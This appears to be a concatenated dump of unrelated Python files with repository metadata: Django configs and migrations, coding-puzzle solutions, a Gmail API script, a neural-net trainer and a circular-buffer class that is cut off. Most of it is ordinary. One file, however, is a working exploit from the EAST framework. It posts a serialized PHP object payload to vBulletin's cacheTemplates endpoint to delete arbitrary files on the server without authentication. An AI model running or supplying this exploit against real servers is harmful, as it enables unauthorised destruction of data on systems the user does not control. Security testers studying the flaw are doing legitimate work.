print(response.status_code)
print(response.body)
print(response.headers)
| [
"[email protected]"
] | |
0e83a10947f41ecdc8506924ac075dff32b6b7b0 | 5b6ec656a247d10011fd67a920aa002ebdf873c3 | /GithubOctarofile/GithubOctarofile/urls.py | d618d9a5c3257a4b79841c4d90f628af694f8d70 | [] | no_license | KhaledAbuNada-AI/Django-Projects | cfb46d46da5f5358171294ca8c02c62c5babf2cf | ff264426d7a650f3c513678bbd71b5519372f6d3 | refs/heads/master | 2022-04-24T10:52:26.791436 | 2020-04-22T15:27:37 | 2020-04-22T15:27:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 976 | py | """GithubOctarofile URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('Octaprofile/', include('OctaProfile.urls'))
]
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) | [
"[email protected]"
] | |
cc33c74f1c0ac7232046e55292d8b413ca1bc988 | 5759c0ed3219c06437ce5b39ef9ad92b5e191fed | /py/0114_flatten_binary_tree_to_linked_list.py | 50bdf3fcfc9bb4e70f86523429fbe8d284228f61 | [] | no_license | mengnan1994/Surrender-to-Reality | ba69df7c36112ad19f19157a9f368eae6340630f | 66232728ce49149188f863271ec2c57e426abb43 | refs/heads/master | 2022-02-25T01:34:49.526517 | 2019-09-22T17:21:28 | 2019-09-22T17:21:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,498 | py | """
Given a binary tree, flatten it to a linked list in-place.
For example, given the following tree:
1
/ \
2 5
/ \ \
3 4 6
The flattened tree should look like:
1
\
2
\
3
\
4
\
5
\
6
"""
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def __init__(self):
self._precursor = None
def flatten(self, root):
"""
前序遍历,注意记录前驱节点,将前驱节点指向当前节点
"""
node_list = []
self._preorder_traverse(root, node_list)
# print(node_list)
for idx in range(0, len(node_list) - 1):
node_list[idx].left = None
node_list[idx].right = node_list[idx + 1]
node_list[-1].left = None
node_list[-1].right = None
root = node_list[0]
def _preorder_traverse(self, node : TreeNode, node_list):
node_list.append(node)
if not node.left and not node.right:
return
if node.left:
self._preorder_traverse(node.left, node_list)
if node.right:
self._preorder_traverse(node.right, node_list)
def flaten_2(self, root):
"""
优化空间复杂度
对于一个节点,其左子树的最右节点是右子的前驱
"""
pass
# def _preorder_traverse_2(self, node : TreeNode):
| [
"[email protected]"
] | |
e2edb5d82d0b7b9a5ce5c04dca7d99743fcc26ab | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /week_or_work/give_group/go_place/fact/child/world.py | ef11efc3b6b9c83521114179cecdc22ea2e4faa1 | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#! /usr/bin/env python
def fact_or_different_group(str_arg):
other_thing(str_arg)
print('last_life_and_time')
def other_thing(str_arg):
print(str_arg)
if __name__ == '__main__':
fact_or_different_group('part')
| [
"[email protected]"
] | |
ba89f8b4fbc89acfbdb68504386a71ea5e70c4ca | b3fc641d4a746401301d917d42dd204a8661874b | /authors/apps/articles/migrations/0009_reported_times_reported.py | 7fd11b5ff494f57db3c9d8ee75cc09f9b68ec1b0 | [
"BSD-3-Clause"
] | permissive | andela/ah-backend-lannister | 7998e0f9729036627ef2aabcdb1bb3c89b356727 | 091bd7e892eb0709a937f0f992f2675ab81ce40c | refs/heads/develop | 2020-03-29T02:31:52.662672 | 2018-11-20T09:14:50 | 2018-11-20T09:14:50 | 149,441,528 | 0 | 5 | BSD-3-Clause | 2018-11-20T09:14:51 | 2018-09-19T11:39:36 | Python | UTF-8 | Python | false | false | 394 | py | # Generated by Django 2.1.1 on 2018-10-18 13:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0008_auto_20181018_1517'),
]
operations = [
migrations.AddField(
model_name='reported',
name='times_reported',
field=models.IntegerField(default=0),
),
]
| [
"[email protected]"
] | |
d77cc9cfc19abaad7bd34df16677a4312d3ea8d1 | f7648ea1c8a9565371c3d4654f7bdf1f2c9278f5 | /BAEK_JOON/Python_algorithm/백준_11053번_가장긴증가하는부분수열.py | 46abd5d65adc6c66937eba0785359af736f28207 | [] | no_license | Sungmin-Joo/Algorithm-competition | 521e019d532cc73e7620c5d1218142d32820eb1f | 6b9513e15f284d95a21eecd84a0a4d0f2ff03402 | refs/heads/master | 2020-05-01T15:25:16.404513 | 2020-01-19T10:41:25 | 2020-01-19T10:41:25 | 177,546,171 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py | import sys
input = sys.stdin.readline
global dp, l
n = int(input())
arr = [*map(int,input().split())]
dp = [0] * n
m = 0
for i in range(n):
if i == 0:
dp[i] = 1
else:
max_dp = 0
for j in range(0, i):
if max_dp < dp[j] and arr[j] < arr[i]:
max_dp = dp[j]
dp[i] = max_dp+1
print(max(dp)) | [
"[email protected]"
] | |
61b16488d1272ea297377739b9d59515dbe88c4f | 2f963d7989749037a3ec27aaa39b31416b33cbb2 | /ib_recommender/interfaces/ib_recommender_service_interface.py | d49a6e35f35d335762e37a87f3106329613780e4 | [] | no_license | migsantos121/phd3-backend | 3cd014908856c995de3c4473d82059bc9c1b5794 | 9d1d2bd6f55dc89719ce5a1916c5db3d573aec1e | refs/heads/master | 2022-12-12T17:25:59.334509 | 2020-03-09T09:24:08 | 2020-03-09T09:24:08 | 245,991,086 | 0 | 0 | null | 2022-06-28T14:45:50 | 2020-03-09T09:17:18 | Python | UTF-8 | Python | false | false | 1,562 | py | from django_swagger_utils.drf_server.decorators.handle_exceptions import handle_exceptions
from ib_common.interface_utils.interface_utils import InterfaceUtils
__author__ = 'ibhubs'
class IBRecommenderServiceInterface(InterfaceUtils):
def __init__(self, *args, **kwargs):
super(IBRecommenderServiceInterface, self).__init__(*args, **kwargs)
@property
def service_flag(self):
from django.conf import settings
from ib_common.constants.service_types import ServiceTypesEnum
return getattr(settings, 'IB_RECOMMENDER_REQUEST_TYPE', ServiceTypesEnum.LIBRARY.value)
@property
def service_base_url(self):
from django.conf import settings
return self.clean_base_url(getattr(settings, 'IB_RECOMMENDER_BASE_URL', '')) + 'api/ib_recommender/'
@property
def client_key_details_id(self):
return 1
@handle_exceptions()
def get_articles(self, request_data=None, path_params=None, query_params=None, headers_obj=None, **kwargs):
setattr(self, 'request_data', request_data)
setattr(self, 'path_params', path_params)
setattr(self, 'query_params', query_params)
setattr(self, 'headers_obj', headers_obj)
setattr(self, 'request_type', 'POST')
setattr(self, 'url_tail', 'articles/')
def api_wrapper(*args, **kwargs):
from ib_recommender.views.get_articles.api_wrapper import api_wrapper
return api_wrapper(*args, **kwargs)
setattr(self, 'api_wrapper', api_wrapper)
return self.execute()
| [
"[email protected]"
] | |
6211c93ef5e464339a3ece24a4c1a0c77ec991bc | 419873dd3b7412f704b1a7907b64a60b44cedf39 | /python/设计/157. 用 Read4 读取 N 个字符.py | 014893b2ac1f2b51dbcea4b77c5c3014bcf07fec | [] | no_license | Weless/leetcode | 0585c5bfa260713f44dabc51fa58ebf8a10e7814 | 0566622daa5849f7deb0cfdc6de2282fb3127f4c | refs/heads/master | 2021-11-13T07:59:20.299920 | 2021-10-25T02:09:53 | 2021-10-25T02:09:53 | 203,720,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | class Solution:
def read(self, buf, n):
count=0
while count<n:
temp = [''] * 4
cur = read4(temp)
if cur == 0 :
break
i = 0
while i < cur and count <n:
buf[count] = temp[i]
count += 1
i+=1
return count
| [
"[email protected]"
] | |
99d0b1a49a4b2b619be7874cf19a6e505931f6d8 | 35b6013c1943f37d1428afd2663c8aba0a02628d | /appengine/flexible_python37_and_earlier/storage/noxfile_config.py | a97c6f1e260127c6b721ab0af921439d0e47fcf6 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | GoogleCloudPlatform/python-docs-samples | d2a251805fbeab15d76ed995cf200727f63f887d | 44e819e713c3885e38c99c16dc73b7d7478acfe8 | refs/heads/main | 2023-08-28T12:52:01.712293 | 2023-08-28T11:18:28 | 2023-08-28T11:18:28 | 35,065,876 | 7,035 | 7,593 | Apache-2.0 | 2023-09-14T20:20:56 | 2015-05-04T23:26:13 | Jupyter Notebook | UTF-8 | Python | false | false | 1,892 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Default TEST_CONFIG_OVERRIDE for python repos.
# You can copy this file into your directory, then it will be imported from
# the noxfile.py.
# The source of truth:
# https://github.com/GoogleCloudPlatform/python-docs-samples/blob/main/noxfile_config.py
TEST_CONFIG_OVERRIDE = {
# You can opt out from the test for specific Python versions.
"ignored_versions": ["2.7", "3.8", "3.9", "3.10", "3.11"],
# Old samples are opted out of enforcing Python type hints
# All new samples should feature them
"enforce_type_hints": True,
# An envvar key for determining the project id to use. Change it
# to 'BUILD_SPECIFIC_GCLOUD_PROJECT' if you want to opt in using a
# build specific Cloud project. You can also use your own string
# to use your own Cloud project.
"gcloud_project_env": "GOOGLE_CLOUD_PROJECT",
# 'gcloud_project_env': 'BUILD_SPECIFIC_GCLOUD_PROJECT',
# If you need to use a specific version of pip,
# change pip_version_override to the string representation
# of the version number, for example, "20.2.4"
"pip_version_override": None,
# A dictionary you want to inject into your test. Don't put any
# secrets here. These values will override predefined values.
"envs": {"CLOUD_STORAGE_BUCKET": "python-docs-samples-tests-public"},
}
| [
"[email protected]"
] | |
764482f357be9bb1f771028e738e7a9b659a4c28 | f361126ee099303113b5ed3cc0e838bd01a9e41b | /Semana3/apoio_pense_python_01.py | 70ff1f0e90b4ccda9dbca5bab5a6967a4df4cce8 | [] | no_license | ju-c-lopes/Univesp_Algoritmos_II | e1ce5557d342ea75fe929cf7b207e633f9aa89cd | 5d4eec368be91c18f0ae5c17d342e6eb0f1c79be | refs/heads/master | 2023-06-05T11:09:25.415719 | 2021-07-07T22:26:53 | 2021-07-07T22:26:53 | 383,600,096 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | def list_sum(num_list):
the_sum = 0
for i in num_list:
the_sum = the_sum + i
return the_sum
print(f'Função {list_sum([1, 3, 5, 7, 9])}')
soma_1 = ((((1 + 3) + 5) + 7) + 9)
print(f'Soma 1 "((((1 + 3) + 5) + 7) + 9)" = {soma_1}')
soma_2 = (1 + (3 + (5 + (7 + 9))))
print(f'Soma 2 "(1 + (3 + (5 + (7 + 9))))" = {soma_2}')
print("EXPLICAÇÃO:\n")
print("total = (1 + (3 + (5 + '_______'))) # resolve primeiro o laço mais interno\n"
". (7 + 9)\n"
". total = (1 + (3 + '________')) # resolve próximo laço mais interno com a soma anterior\n"
". (5 + 16)\n"
". total = (1 + '________') # resolve próximo laço mais interno com a soma anterior\n"
". (3 + 21)\n"
". total = (1 + 24) # por fim, resolve a última soma, resultando o total final\n"
".\n"
". total = 25")
def soma_lista(num_list):
if len(num_list) == 1:
return num_list[0]
else:
return num_list + list_sum(num_list[1:])
print(f'\n{list_sum([1, 3, 5, 7, 9])}')
print("""
TESTE:
def soma(a, b=0):
return a + b
print(soma(9, soma(7, soma(5, soma(3, soma(1))))))
""")
def soma(a, b=0):
return a + b
print(soma(9, soma(7, soma(5, soma(3, soma(1))))))
| [
"[email protected]"
] | |
272fe74eaf3eb220407cf3f170f25e94cf1d1ea6 | 37908440ce625e4ad15c7fdae0f5c42a0f7f06cd | /exploits/efa_vbulletin_afd.py | 8b51cf55eb2f9dbda403b2f0c0a4eaa2fdf4901a | [] | no_license | sec-js/EaST | daff1c84e73e43825a87e3c2c1ec63d05d73141b | 4b1ab5333022bbd476e9a43f13c4a4b559488752 | refs/heads/master | 2023-01-07T13:14:28.480980 | 2022-09-18T18:21:19 | 2022-09-18T18:21:19 | 337,508,843 | 0 | 0 | null | 2022-12-21T23:26:22 | 2021-02-09T19:09:47 | null | UTF-8 | Python | false | false | 3,347 | py | #! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
import sys
import os
import urllib2
from collections import OrderedDict
sys.path.append('./core')
from Sploit import Sploit
INFO = {}
INFO['NAME'] = "efa_vbulletin_afd"
INFO['DESCRIPTION'] = "vBulletin cacheTemplates - Unauthenticated Remote Arbitrary File Deletion"
INFO['VENDOR'] = "https://www.vbulletin.com/"
INFO['DOWNLOAD_LINK'] = ''
INFO['LINKS'] = ['https://blogs.securiteam.com/index.php/archives/3573']
INFO["CVE Name"] = ""
INFO["NOTES"] = """By sending POST request an unauthenticated attacker can delete files from the victims server
"""
INFO['CHANGELOG'] = "15 Dec 2017. Written by Gleg team."
INFO['PATH'] = 'Exploits/Web/'
# Must be in every module, to be set by framework
OPTIONS = OrderedDict()
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
OPTIONS["PORT"] = 80, dict(description = 'Target port')
OPTIONS["BASEPATH"] = '/vb', dict(description = 'Basepath')
OPTIONS['PATH'] = '/path/to/file', dict(description = 'File to delete')
OPTIONS['SSL'] = False, dict(description = 'Use SSL')
class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.host = host
self.port = port
self.ssl = False
self.basepath = "/"
self.path = OPTIONS['PATH']
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.path = self.args.get('PATH', OPTIONS['PATH'])
self.ssl = bool(self.args.get('SSL', False))
self.basepath = self.args.get('BASEPATH', self.basepath)
if self.ssl:
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
opener = urllib2.build_opener(urllib2.HTTPSHandler(context=context))
urllib2.install_opener(opener)
def make_url(self, path = ''):
return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)
def prot(self):
return self.ssl and 'https://' or 'http://'
def run(self):
self.args()
self.log("Attacking {}".format(self.host))
url = self.make_url('/ajax/api/template/cacheTemplates')
data = 'templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:LEN:"FILE";}'
data = data.replace('LEN', str(len(self.path)))
data = data.replace('FILE', self.path)
self.log('Try to delete file ' + self.path)
try:
request = urllib2.Request(url, data)
fd = urllib2.urlopen(request)
content = fd.read()
except Exception as e:
self.log(e)
self.finish(False)
self.finish(True)
if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit('', 80)
e.run()
| [
"[email protected]"
] | |
dd63d8ff2276e64b1806676cac723baf74f0ecb7 | 306afd5282d9c24d58297478a1728a006c29e57e | /lintcode/lintcode_0547_Intersection_of_Two_Arrays.py | ddcecd3100ee335a8a14d3b209fb6a19895c1786 | [] | no_license | ytatus94/Leetcode | d2c1fe3995c7a065139f772569485dc6184295a9 | 01ee75be4ec9bbb080f170cb747f3fc443eb4d55 | refs/heads/master | 2023-06-08T17:32:34.439601 | 2023-05-29T04:33:19 | 2023-05-29T04:33:19 | 171,921,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 600 | py | from typing import (
List,
)
class Solution:
"""
@param nums1: an integer array
@param nums2: an integer array
@return: an integer array
we will sort your return value in output
"""
def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:
# write your code here
if not nums1 or not nums2:
return []
hash_set = set()
for i in nums1:
hash_set.add(i)
result = set()
for i in nums2:
if i in hash_set:
result.add(i)
return list(result)
| [
"[email protected]"
] | |
1a770f79fd81c17269f4ed63636862fb554d30ca | 0f205fa73d927a15e27f065c6a198935f90d3ada | /src/pycones/proposals/migrations/0001_initial.py | 50994be6deb17fc6ba0539338afcce03c1f8e433 | [] | no_license | python-spain/web-pycones | b27bfb630cb6eafb8e1a5aadfa7b35368f81325a | 942516169738689f542b0856842372088f34fc2f | refs/heads/2020 | 2023-03-30T06:01:30.809205 | 2020-03-23T22:08:27 | 2020-03-23T22:08:27 | 80,434,627 | 3 | 4 | null | 2021-04-08T20:55:32 | 2017-01-30T15:36:49 | CSS | UTF-8 | Python | false | false | 4,690 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-31 12:32
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import markupfield.fields
import model_utils.fields
import taggit_autosuggest.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('speakers', '0001_initial'),
('taggit', '0002_auto_20150616_2121'),
]
operations = [
migrations.CreateModel(
name='Proposal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('audience_level', models.CharField(choices=[('basic', 'Básico'), ('intermediate', 'Intermedio'), ('advanced', 'Avanzado')], default='basic', max_length=32, null=True, verbose_name='Nivel de la audiencia')),
('language', models.CharField(choices=[('es', 'Español'), ('en', 'Inglés')], default='es', max_length=2, verbose_name='Idioma')),
('duration', models.PositiveIntegerField(blank=True, choices=[(15, '15 minutos'), (30, '30 minutos')], default=30, null=True, verbose_name='Duración')),
('title', models.CharField(max_length=100, verbose_name='Título')),
('description', models.TextField(help_text='Si tu propuesta se acepta esto se hará público, y se incluirá en el programa. Debería ser un párrafo, con un máximo de 500 caracteres.', max_length=500, verbose_name='Breve descripción')),
('abstract', markupfield.fields.MarkupField(blank=True, default='', help_text="Resumen detallado. Se hará pública si la propuesta se acepta. Edita usando <a href='http://daringfireball.net/projects/markdown/basics' target='_blank'>Markdown</a>.", rendered_field=True, verbose_name='Resumen detallado')),
('abstract_markup_type', models.CharField(choices=[('', '--'), ('markdown', 'markdown')], default='markdown', max_length=30)),
('additional_notes', markupfield.fields.MarkupField(blank=True, default='', help_text="Cualquier cosa que te gustaría hacer saber a los revisores para que la tengan en cuenta al ahora de hacer la selección. Esto no se hará público. Edita usando <a href='http://daringfireball.net/projects/markdown/basics' target='_blank'>Markdown</a>.", rendered_field=True, verbose_name='Notas adicionales')),
('_abstract_rendered', models.TextField(editable=False)),
('additional_notes_markup_type', models.CharField(choices=[('', '--'), ('markdown', 'markdown')], default='markdown', max_length=30)),
('cancelled', models.BooleanField(default=False)),
('_additional_notes_rendered', models.TextField(editable=False)),
('notified', models.BooleanField(default=False)),
('accepted', models.NullBooleanField(default=None, verbose_name='Aceptada')),
('accepted_notified', models.BooleanField(default=False, verbose_name='Notificación de aceptación enviada')),
('code', models.CharField(blank=True, max_length=64, null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ProposalKind',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('slug', models.SlugField()),
],
),
migrations.AddField(
model_name='proposal',
name='kind',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='proposals.ProposalKind', verbose_name='Tipo de propuesta'),
),
migrations.AddField(
model_name='proposal',
name='speakers',
field=models.ManyToManyField(related_name='proposals', to='speakers.Speaker'),
),
migrations.AddField(
model_name='proposal',
name='tags',
field=taggit_autosuggest.managers.TaggableManager(blank=True, help_text='Lista de etiquetas separadas por comas.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Etiquetas'),
),
]
| [
"[email protected]"
] | |
643ff60586427861267b2eb9c8e880763094d83e | 4609ee89172d6f5f0b0bb59faf13f67f8a4bad28 | /gclient/mark_as_read.py | 21fb6040a8bf72d2e955bbfe3a497187132b5985 | [] | no_license | QuentinDuval/GmailClient | 82cf53f4d412280af608b9d90d50eded75b393e1 | c0a69fe75d22d1ddd932de16107d799473c68e6b | refs/heads/master | 2020-06-10T21:17:02.591884 | 2019-06-25T17:09:40 | 2019-06-25T17:09:40 | 193,750,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,861 | py | from __future__ import print_function
from gclient.authentication import *
from googleapiclient.discovery import build
from typing import List
class Classification:
def __init__(self):
self.creds = get_credentials()
self.service = build('gmail', 'v1', credentials=self.creds)
def get_all_labels(self) -> List[str]:
"""
Returns all the labels used to classify mails
"""
results = self.service.users().labels().list(userId='me').execute()
return list(results.get('labels', []))
def list_unread_messages(self, batch_size=500):
"""
Query GMAIL API to get the list of messages matching the "is unread" criteria
"""
answer = self.service.users().messages().list(userId='me', q='is:unread', maxResults=batch_size).execute()
while answer['messages']:
yield answer
if 'nextPageToken' not in answer:
break
next_page_token = answer['nextPageToken']
answer = self.service.users().messages().list(userId='me', pageToken=next_page_token).execute()
def mark_as_read(self, message_ids: List[str]):
"""
Ask the GMAIL API to mark as "read" all the messages given as parameters
"""
return self.service.users().messages().batchModify(userId='me', body={
"removeLabelIds": ["UNREAD"],
"ids": message_ids,
"addLabelIds": []
}).execute()
def mark_all_as_read(self):
for answer in self.list_unread_messages():
message_ids = [message['id'] for message in answer['messages']]
print("Marked", message_ids)
self.mark_as_read(message_ids)
if __name__ == '__main__':
classifier = Classification()
print(classifier.get_all_labels())
print(classifier.mark_all_as_read())
| [
"[email protected]"
] | |
a57fa2b7364d63958571fb4e0853f4351b795d94 | 0add7953d3e3ce2df9e8265102be39b758579753 | /built-in/TensorFlow/Research/reinforcement-learning/ModelZoo_QMIX_TensorFlow/xt/benchmark/configs/default_xt.py | 3f596108539b438663d6aaf4a5988cd8513e8366 | [
"Apache-2.0"
] | permissive | Huawei-Ascend/modelzoo | ae161c0b4e581f8b62c77251e9204d958c4cf6c4 | df51ed9c1d6dbde1deef63f2a037a369f8554406 | refs/heads/master | 2023-04-08T08:17:40.058206 | 2020-12-07T08:04:57 | 2020-12-07T08:04:57 | 319,219,518 | 1 | 1 | Apache-2.0 | 2023-03-24T22:22:00 | 2020-12-07T06:01:32 | Python | UTF-8 | Python | false | false | 428 | py | """
default configure for benchmark function
"""
class XtBenchmarkConf(object):
"""benchmark conf, user also can re-set it"""
default_db_root = "/tmp/.xt_data/sqlite" # could set path by yourself
default_id = "xt_default_benchmark"
defalut_log_path = "/tmp/.xt_data/logs"
default_tb_path = "/tmp/.xt_data/tensorboard"
default_plot_path = "/tmp/.xt_data/plot"
default_train_interval_per_eval = 200
| [
"[email protected]"
] | |
67ffa6937e05e7704b90376cbd3bb100ea85a51e | 901944f407f4a06a4c4027d6139ce21165976857 | /neural_net/Neural_Net_CC/main.py | 41bce1152dcd33c242b3bd32556f6a2f50ee5a48 | [] | no_license | chriscremer/Other_Code | a406da1d567d63bf6ef9fd5fbf0a8f177bc60b05 | 7b394fa87523803b3f4536b316df76cc44f8846e | refs/heads/master | 2021-01-17T02:34:56.215047 | 2020-05-26T13:59:05 | 2020-05-26T13:59:05 | 34,680,279 | 7 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,354 | py |
import numpy as np
import csv
import random
import pickle
from NN_cc import Network
from costs import *
from activations import *
from sklearn import preprocessing
if __name__ == "__main__":
####################################
#Load data
####################################
MY_DATASET = '/data1/morrislab/ccremer/simulated_data/simulated_classification_data_100_samps_1000_feats_3_distinct.csv'
X = []
y = []
header = True
with open(MY_DATASET, 'r') as f:
csvreader = csv.reader(f, delimiter=',', skipinitialspace=True)
for row in csvreader:
if header:
header = False
continue
X.append(map(float,row[1:-1]))
if str(row[-1]) == '0.0':
y.append([1.0,0.0])
else:
y.append([0.0,1.0])
X = np.array(X)
y = np.array(y)
#preprocess
preprocessor = preprocessing.StandardScaler()
preprocessor.fit(X)
X = preprocessor.transform(X)
#X_test = preprocessor.transform(X_test)
training_data= []
for i in range(0,70):
training_data.append((np.array(X[i], ndmin=2).T, np.array(y[i], ndmin=2).T))
evaluation_data= []
for i in range(70,100):
evaluation_data.append((np.array(X[i], ndmin=2).T, np.array(y[i], ndmin=2).T))
print 'Numb of Samples: ' + str(len(training_data))
print 'X shape: ' + str(training_data[0][0].shape)
print 'y shape: ' + str(training_data[0][1].shape)
####################################
#Train Model
####################################
#load pickled model
weights_n_biases = pickle.load( open( "saved/w_n_b.p", "rb" ) )
#weights_n_biases = None
#dimension of input, hidden layer, dimension of output
net = Network(layer_sizes=[len(X[0]), 3, len(y[0])],
activations=[Sigmoid_Activation, Sigmoid_Activation],
cost=CrossEntropyCost,
regularization='l1',
weights_n_biases=weights_n_biases)
evaluation_cost, evaluation_accuracy, training_cost, training_accuracy = net.SGD(training_data=training_data,
epochs=200,
mini_batch_size=2,
learn_rate=0.001,
lmbda=0.001,
monitor_training_cost=True,
monitor_training_accuracy=True,
evaluation_data=evaluation_data,
monitor_evaluation_cost=True,
monitor_evaluation_accuracy=True
)
| [
"[email protected]"
] | |
3b9fe333e7d4065f42d1f796e206238245df2998 | 99d7a6448a15e7770e3b6f3859da043300097136 | /src/database/orms/api.py | e8c05566f0edc99644329043e8244fbdd6556648 | [] | no_license | softtrainee/arlab | 125c5943f83b37bc7431ae985ac7b936e08a8fe4 | b691b6be8214dcb56921c55daed4d009b0b62027 | refs/heads/master | 2020-12-31T07:54:48.447800 | 2013-05-06T02:49:12 | 2013-05-06T02:49:12 | 53,566,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | #===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
from bakeout_orm import *
from device_scan_orm import *
from power_map_orm import *
from power_orm import *
from video_orm import *
| [
"jirhiker@localhost"
] | jirhiker@localhost |
149aed53ef04fe6d76ede1ef8340dd96c015d78c | e9cdf644f02c5f90e5af4ebcdfbd49e5739b379e | /lists/urls.py | fe220099563a5549be4bb60720a1f07720c68cff | [] | no_license | jaeyholic/airbnb-clone | 14e661012f3650a7c1486e43bbcb314eb0ac1ba1 | 68c1815e2b62bbf70dfe5a4a580d970015eaccc2 | refs/heads/master | 2022-12-13T08:11:04.759907 | 2020-02-12T02:22:28 | 2020-02-12T02:22:28 | 236,361,148 | 0 | 0 | null | 2022-12-10T17:29:25 | 2020-01-26T19:04:10 | Python | UTF-8 | Python | false | false | 143 | py | from django.urls import path
from . import views
app_name = "trips"
urlpatterns = [
path("", views.ListView.as_view(), name="trips"),
]
| [
"[email protected]"
] | |
3b2c8a39c47fb25067878ad79635a6e28b0ae266 | f6e03bc2747e8d1ca686b25e7f34a429886ba3f3 | /machinelearning/cbct/build_cbct_learner.py | 073853c6c8166f3e77a0a6c519c82cc5d099f2dc | [
"MIT"
] | permissive | randlet/pylinac | 2b3913d7d549b985a074ddcf291d018cfb1dd5d2 | df5dd913f429536180d998012b4f5cef8d443f88 | refs/heads/master | 2021-06-11T08:50:36.472577 | 2019-06-03T14:23:17 | 2019-06-03T14:23:17 | 151,657,740 | 1 | 0 | MIT | 2018-10-05T01:40:17 | 2018-10-05T01:40:16 | null | UTF-8 | Python | false | false | 276 | py | import os.path as osp
from machinelearning.tools import train
path = osp.join(osp.dirname(__file__), 'data', 'CatPhan 600')
parameters = {
'kernel': ['linear'],
'C': [1, 0.1, 5, 10, 50],
}
train(path, train_size=0.95, parameters=parameters, clf_name='catphan600')
| [
"[email protected]"
] | |
6a2be014eb9649c77461f9d7117a20e1f10fb3d6 | 0502750293383c6dae2aaf4013717d9c83f52c62 | /exercism/python/archive/circular-buffer/circular_buffer.py | c143a3cdcdf9880436d13286be272c674f6461d5 | [] | no_license | sebito91/challenges | fcfb680e7fc1abfa9fea9cd5f108c42795da4679 | b4f2d3b7f8b7c78f02b67d67d4bcb7fad2b7e284 | refs/heads/master | 2023-07-08T15:43:42.850679 | 2023-06-26T19:38:51 | 2023-06-26T19:38:51 | 117,160,720 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,199 | py | """ Mdolue to implement a circular-buffer """
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
class BufferFullException(Exception):
""" define execption when buffer is full """
def __init__(self, message=None):
if not message:
message = "buffer is full"
super(BufferFullException, self).__init__(message)
class BufferEmptyException(Exception):
""" define exception when buffer is empty """
def __init__(self, message=None):
if not message:
message = "buffer is empty"
super(BufferEmptyException, self).__init__(message)
class CircularBuffer(object):
""" definition of the back CircularBuffer class """
def __init__(self, datasize):
if datasize <= 0:
raise ValueError("improper size for CircularBuffer: {}".format(datasize))
